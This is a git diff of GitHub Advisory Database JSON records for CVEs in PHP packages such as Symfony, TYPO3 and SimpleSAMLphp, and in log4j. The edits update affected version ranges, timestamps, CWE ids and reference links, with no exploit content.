a/advisories/github-reviewed/2020/01/GHSA-p9cm-r7jg-8q3g/GHSA-p9cm-r7jg-8q3g.json +++ b/advisories/github-reviewed/2020/01/GHSA-p9cm-r7jg-8q3g/GHSA-p9cm-r7jg-8q3g.json @@ -44,6 +44,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-9955" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2016-9955.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00001.html" diff --git a/advisories/github-reviewed/2020/02/GHSA-qvrv-2x7x-78x2/GHSA-qvrv-2x7x-78x2.json b/advisories/github-reviewed/2020/02/GHSA-qvrv-2x7x-78x2/GHSA-qvrv-2x7x-78x2.json index 4aa68ef1c02c6..40580580dec27 100644 --- a/advisories/github-reviewed/2020/02/GHSA-qvrv-2x7x-78x2/GHSA-qvrv-2x7x-78x2.json +++ b/advisories/github-reviewed/2020/02/GHSA-qvrv-2x7x-78x2/GHSA-qvrv-2x7x-78x2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qvrv-2x7x-78x2", - "modified": "2021-08-19T17:22:37Z", + "modified": "2024-02-06T17:33:37Z", "published": "2020-02-24T17:33:31Z", "aliases": [ "CVE-2019-19325" @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "4.5.0" }, { - "fixed": "4.4.5" + "fixed": "4.5.2" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.5.0" + "introduced": "4.0.0" }, { - "fixed": "4.5.2" + "fixed": "4.4.5" } ] } @@ -63,18 +63,27 @@ "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-framework/commit/49fda52b12ba59f0a04bcabf78425586a8779e89" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-19325.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/cve-2019-19325" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-19325/" } ], "database_specific": { "cwe_ids": [ - "CWE-78" + "CWE-78", + "CWE-79" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2020-02-18T20:11:37Z", - "nvd_published_at": null + "nvd_published_at": "2020-02-17T20:15:11Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/02/GHSA-w2fr-65vp-mxw3/GHSA-w2fr-65vp-mxw3.json b/advisories/github-reviewed/2020/02/GHSA-w2fr-65vp-mxw3/GHSA-w2fr-65vp-mxw3.json index 57920bfab485d..a50e50e211e40 100644 --- a/advisories/github-reviewed/2020/02/GHSA-w2fr-65vp-mxw3/GHSA-w2fr-65vp-mxw3.json +++ b/advisories/github-reviewed/2020/02/GHSA-w2fr-65vp-mxw3/GHSA-w2fr-65vp-mxw3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w2fr-65vp-mxw3", - "modified": "2021-08-19T17:12:23Z", + "modified": "2024-02-05T11:09:27Z", "published": "2020-02-12T18:44:50Z", "aliases": [ "CVE-2019-10912" @@ -223,6 +223,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.8" + } + ] + } + ] } ], "references": [ @@ -246,6 +284,46 @@ "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-10912.yaml" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2019-10912.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2019-10912.yaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/42UEKSLKJB72P24JBWVN6AADHLMYSUQD/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QEAOZXVNDA63537A2OIH4QE77EKZR5O/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BAC2TQVEEH5FDJSSWPM2BCRIPTCOEMMO/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BHHIG4GMSGEIDT3RITSW7GJ5NT6IBHXU/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LFARAUAWZE4UDSKVDWRD35D75HI5UGSD/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MDSM576XIOVXVCMHNJHLBBZBTOD62LDA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RTJGZJLPG5FHKFH7KNAKNTWOGBB6LXAL/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLOZX5BZMQKWG7PJRQL6MB5CAMKBQAWD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42UEKSLKJB72P24JBWVN6AADHLMYSUQD/" @@ -290,6 +368,10 @@ "type": "WEB", "url": "https://symfony.com/cve-2019-10912" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-016" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-016/" @@ -306,6 +388,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2020-02-11T20:17:25Z", - "nvd_published_at": null + "nvd_published_at": "2019-05-16T22:29:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/02/GHSA-x8wj-6m73-gfqp/GHSA-x8wj-6m73-gfqp.json b/advisories/github-reviewed/2020/02/GHSA-x8wj-6m73-gfqp/GHSA-x8wj-6m73-gfqp.json index fb1012b4fd6e4..cb02ea43b2152 100644 --- a/advisories/github-reviewed/2020/02/GHSA-x8wj-6m73-gfqp/GHSA-x8wj-6m73-gfqp.json +++ b/advisories/github-reviewed/2020/02/GHSA-x8wj-6m73-gfqp/GHSA-x8wj-6m73-gfqp.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0.0" }, { - "fixed": "1.9.3" + "fixed": "2.1.5" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0.0" + "introduced": "1.0.0" }, { - "fixed": "2.1.5" + "fixed": "1.9.3" } ] } @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/1up-lab/OneupUploaderBundle/commit/a6011449b716f163fe1ae323053077e59212350c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/oneup/uploader-bundle/CVE-2020-5237.yaml" + }, { "type": "WEB", "url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-003.txt" diff --git a/advisories/github-reviewed/2020/03/GHSA-g4m9-5hpf-hx72/GHSA-g4m9-5hpf-hx72.json b/advisories/github-reviewed/2020/03/GHSA-g4m9-5hpf-hx72/GHSA-g4m9-5hpf-hx72.json index 50e03ae363777..d4ace9791317b 100644 --- a/advisories/github-reviewed/2020/03/GHSA-g4m9-5hpf-hx72/GHSA-g4m9-5hpf-hx72.json +++ b/advisories/github-reviewed/2020/03/GHSA-g4m9-5hpf-hx72/GHSA-g4m9-5hpf-hx72.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4m9-5hpf-hx72", - "modified": "2021-01-14T17:48:29Z", + "modified": "2024-02-05T11:13:15Z", "published": "2020-03-30T20:09:44Z", "aliases": [ "CVE-2020-5275" @@ -90,6 +90,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.0.7" + } + ] + } + ] } ], "references": [ @@ -105,9 +143,25 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/c935e4a3fba6cc2ab463a6ca382858068d63cebf" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2020-5275.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2020-5275.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2020-5275.yaml" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C36JLPHUPKDFAX6D5WYFC4ALO2K7RDUQ/" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2020-5275" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/03/GHSA-m884-279h-32v2/GHSA-m884-279h-32v2.json b/advisories/github-reviewed/2020/03/GHSA-m884-279h-32v2/GHSA-m884-279h-32v2.json index 54bffb6c047dd..06270da720446 100644 --- a/advisories/github-reviewed/2020/03/GHSA-m884-279h-32v2/GHSA-m884-279h-32v2.json +++ b/advisories/github-reviewed/2020/03/GHSA-m884-279h-32v2/GHSA-m884-279h-32v2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m884-279h-32v2", - "modified": "2021-05-12T23:54:24Z", + "modified": "2024-02-06T13:30:38Z", "published": "2020-03-30T20:09:31Z", "aliases": [ "CVE-2020-5274" @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Packagist", - "name": "symfony/http-foundation" + "name": "symfony/error-handler" }, "ranges": [ { @@ -37,7 +37,45 @@ { "package": { "ecosystem": "Packagist", - "name": "symfony/http-foundation" + "name": "symfony/error-handler" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.0.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" }, "ranges": [ { @@ -70,6 +108,18 @@ { "type": "WEB", "url": "https://github.com/symfony/symfony/commit/cf80224589ac05402d4f72f5ddf80900ec94d5ad" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/error-handler/CVE-2020-5274.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2020-5274.yaml" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2020-5274" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/03/GHSA-mcx4-f5f5-4859/GHSA-mcx4-f5f5-4859.json b/advisories/github-reviewed/2020/03/GHSA-mcx4-f5f5-4859/GHSA-mcx4-f5f5-4859.json index 65a960aef24b9..d8cc69c788645 100644 --- a/advisories/github-reviewed/2020/03/GHSA-mcx4-f5f5-4859/GHSA-mcx4-f5f5-4859.json +++ b/advisories/github-reviewed/2020/03/GHSA-mcx4-f5f5-4859/GHSA-mcx4-f5f5-4859.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.0.7" + } + ] + } + ] } ], "references": [ @@ -67,6 +105,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/dca343442e6a954f96a2609e7b4e9c21ed6d74e6" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2020-5255.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2020-5255.yaml" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C36JLPHUPKDFAX6D5WYFC4ALO2K7RDUQ/" @@ -74,6 +120,10 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2020-5255-prevent-cache-poisoning-via-a-response-content-type-header" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2020-5255" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/04/GHSA-24m3-w8g9-jwpq/GHSA-24m3-w8g9-jwpq.json b/advisories/github-reviewed/2020/04/GHSA-24m3-w8g9-jwpq/GHSA-24m3-w8g9-jwpq.json index 7fd5d122295b8..6a8baea6e852f 100644 --- a/advisories/github-reviewed/2020/04/GHSA-24m3-w8g9-jwpq/GHSA-24m3-w8g9-jwpq.json +++ b/advisories/github-reviewed/2020/04/GHSA-24m3-w8g9-jwpq/GHSA-24m3-w8g9-jwpq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-24m3-w8g9-jwpq", - "modified": "2021-10-20T22:23:05Z", + "modified": "2024-02-06T13:27:42Z", "published": "2020-04-22T20:59:44Z", "aliases": [ "CVE-2020-5301" @@ -48,9 +48,17 @@ "type": "WEB", "url": "https://github.com/simplesamlphp/simplesamlphp/commit/47968d26a2fd3ed52da70dc09210921d612ce44e" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2020-5301.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/simplesamlphp/simplesamlphp/" + }, + { + "type": "WEB", + "url": "https://simplesamlphp.org/security/202004-01" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-2rxh-h6h9-qrqc/GHSA-2rxh-h6h9-qrqc.json b/advisories/github-reviewed/2020/05/GHSA-2rxh-h6h9-qrqc/GHSA-2rxh-h6h9-qrqc.json index bd72018a33a03..510ad3182961b 100644 --- a/advisories/github-reviewed/2020/05/GHSA-2rxh-h6h9-qrqc/GHSA-2rxh-h6h9-qrqc.json +++ b/advisories/github-reviewed/2020/05/GHSA-2rxh-h6h9-qrqc/GHSA-2rxh-h6h9-qrqc.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ @@ -62,6 +100,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11066" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11066.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11066.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-004" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-2wj9-434x-9hvp/GHSA-2wj9-434x-9hvp.json b/advisories/github-reviewed/2020/05/GHSA-2wj9-434x-9hvp/GHSA-2wj9-434x-9hvp.json index 97cba3dd26510..cb7f6f80bb64b 100644 --- a/advisories/github-reviewed/2020/05/GHSA-2wj9-434x-9hvp/GHSA-2wj9-434x-9hvp.json +++ b/advisories/github-reviewed/2020/05/GHSA-2wj9-434x-9hvp/GHSA-2wj9-434x-9hvp.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ @@ -62,6 +100,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11067" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11067.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11067.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-005" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-347x-877p-hcwx/GHSA-347x-877p-hcwx.json b/advisories/github-reviewed/2020/05/GHSA-347x-877p-hcwx/GHSA-347x-877p-hcwx.json index 18ab5e0c6fee5..fcd884a6c27b0 100644 --- a/advisories/github-reviewed/2020/05/GHSA-347x-877p-hcwx/GHSA-347x-877p-hcwx.json +++ b/advisories/github-reviewed/2020/05/GHSA-347x-877p-hcwx/GHSA-347x-877p-hcwx.json @@ -25,17 +25,33 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "10.4.0" + "introduced": "10.0.0" }, { "fixed": "10.4.2" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.1" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] } ], "references": [ @@ -46,6 +62,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11063" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11063.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11063.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-001" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-43gj-mj2w-wh46/GHSA-43gj-mj2w-wh46.json b/advisories/github-reviewed/2020/05/GHSA-43gj-mj2w-wh46/GHSA-43gj-mj2w-wh46.json index 89dc023c550c7..bfd6848306d05 100644 --- a/advisories/github-reviewed/2020/05/GHSA-43gj-mj2w-wh46/GHSA-43gj-mj2w-wh46.json +++ b/advisories/github-reviewed/2020/05/GHSA-43gj-mj2w-wh46/GHSA-43gj-mj2w-wh46.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ @@ -62,6 +100,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11064" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11064.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11064.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-002" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-4j77-gg36-9864/GHSA-4j77-gg36-9864.json b/advisories/github-reviewed/2020/05/GHSA-4j77-gg36-9864/GHSA-4j77-gg36-9864.json index 9028f2930c3dc..3e485c27d5b99 100644 --- a/advisories/github-reviewed/2020/05/GHSA-4j77-gg36-9864/GHSA-4j77-gg36-9864.json +++ b/advisories/github-reviewed/2020/05/GHSA-4j77-gg36-9864/GHSA-4j77-gg36-9864.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "9.5.12" + "introduced": "10.0.0" }, { - "fixed": "9.5.17" + "fixed": "10.4.2" } ] } @@ -44,7 +44,26 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "10.2.0" + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" }, { "fixed": "10.4.2" @@ -52,6 +71,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ @@ -62,6 +100,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11065" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11065.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11065.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-003" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-pqg8-crx9-g8m4/GHSA-pqg8-crx9-g8m4.json b/advisories/github-reviewed/2020/05/GHSA-pqg8-crx9-g8m4/GHSA-pqg8-crx9-g8m4.json index 43c68276febbc..1de2d734e785d 100644 --- a/advisories/github-reviewed/2020/05/GHSA-pqg8-crx9-g8m4/GHSA-pqg8-crx9-g8m4.json +++ b/advisories/github-reviewed/2020/05/GHSA-pqg8-crx9-g8m4/GHSA-pqg8-crx9-g8m4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pqg8-crx9-g8m4", - "modified": "2021-11-08T18:49:16Z", + "modified": "2024-02-05T11:13:08Z", "published": "2020-05-13T23:40:09Z", "aliases": [ "CVE-2020-11069" @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ @@ -62,6 +100,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11069" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11069.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11069.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-006" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/06/GHSA-vwqq-5vrc-xw9h/GHSA-vwqq-5vrc-xw9h.json b/advisories/github-reviewed/2020/06/GHSA-vwqq-5vrc-xw9h/GHSA-vwqq-5vrc-xw9h.json index 84f664f9edd91..cb093e6992873 100644 --- a/advisories/github-reviewed/2020/06/GHSA-vwqq-5vrc-xw9h/GHSA-vwqq-5vrc-xw9h.json +++ b/advisories/github-reviewed/2020/06/GHSA-vwqq-5vrc-xw9h/GHSA-vwqq-5vrc-xw9h.json @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.13.0" }, { "fixed": "2.13.2" @@ -44,7 +44,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.13.0" }, { "fixed": "2.13.2" @@ -52,6 +52,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.logging.log4j:log4j" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.12.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.logging.log4j:log4j" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.logging.log4j:log4j-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.12.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.logging.log4j:log4j-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3.2" + } + ] + } + ] } ], "references": [ diff --git a/advisories/github-reviewed/2020/07/GHSA-3x94-fv5h-5q2c/GHSA-3x94-fv5h-5q2c.json b/advisories/github-reviewed/2020/07/GHSA-3x94-fv5h-5q2c/GHSA-3x94-fv5h-5q2c.json index 95506a97e8a28..b4990a46c6a43 100644 --- a/advisories/github-reviewed/2020/07/GHSA-3x94-fv5h-5q2c/GHSA-3x94-fv5h-5q2c.json +++ b/advisories/github-reviewed/2020/07/GHSA-3x94-fv5h-5q2c/GHSA-3x94-fv5h-5q2c.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.20" + } + ] + } + ] } ], "references": [ @@ -63,6 +101,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15099" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-15099.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-15099.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/TYPO3.CMS" diff --git a/advisories/github-reviewed/2020/07/GHSA-43jj-2rwc-2m3f/GHSA-43jj-2rwc-2m3f.json b/advisories/github-reviewed/2020/07/GHSA-43jj-2rwc-2m3f/GHSA-43jj-2rwc-2m3f.json index a8069e8ad7f77..30a5d50ce5fa0 100644 --- a/advisories/github-reviewed/2020/07/GHSA-43jj-2rwc-2m3f/GHSA-43jj-2rwc-2m3f.json +++ b/advisories/github-reviewed/2020/07/GHSA-43jj-2rwc-2m3f/GHSA-43jj-2rwc-2m3f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43jj-2rwc-2m3f", - "modified": "2021-09-22T21:03:46Z", + "modified": "2024-02-01T19:02:40Z", "published": "2020-07-15T17:38:04Z", "aliases": [ "CVE-2019-14273" @@ -91,6 +91,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2020-07-15T17:33:55Z", - "nvd_published_at": null + "nvd_published_at": "2019-09-26T12:15:11Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/07/GHSA-4h44-w6fm-548g/GHSA-4h44-w6fm-548g.json b/advisories/github-reviewed/2020/07/GHSA-4h44-w6fm-548g/GHSA-4h44-w6fm-548g.json index 5ce4f46bfa15b..4aefcc723af1d 100644 --- a/advisories/github-reviewed/2020/07/GHSA-4h44-w6fm-548g/GHSA-4h44-w6fm-548g.json +++ b/advisories/github-reviewed/2020/07/GHSA-4h44-w6fm-548g/GHSA-4h44-w6fm-548g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4h44-w6fm-548g", - "modified": "2021-11-19T15:44:20Z", + "modified": "2024-02-05T10:43:51Z", "published": "2020-07-29T16:15:12Z", "aliases": [ "CVE-2020-15086" @@ -52,9 +52,17 @@ "type": "WEB", "url": "https://github.com/FriendsOfTYPO3/mediace/commit/fa29ffd3e8b275782a8600d2406e1b1e5e16ae75" }, + { + "type": "WEB", + "url": 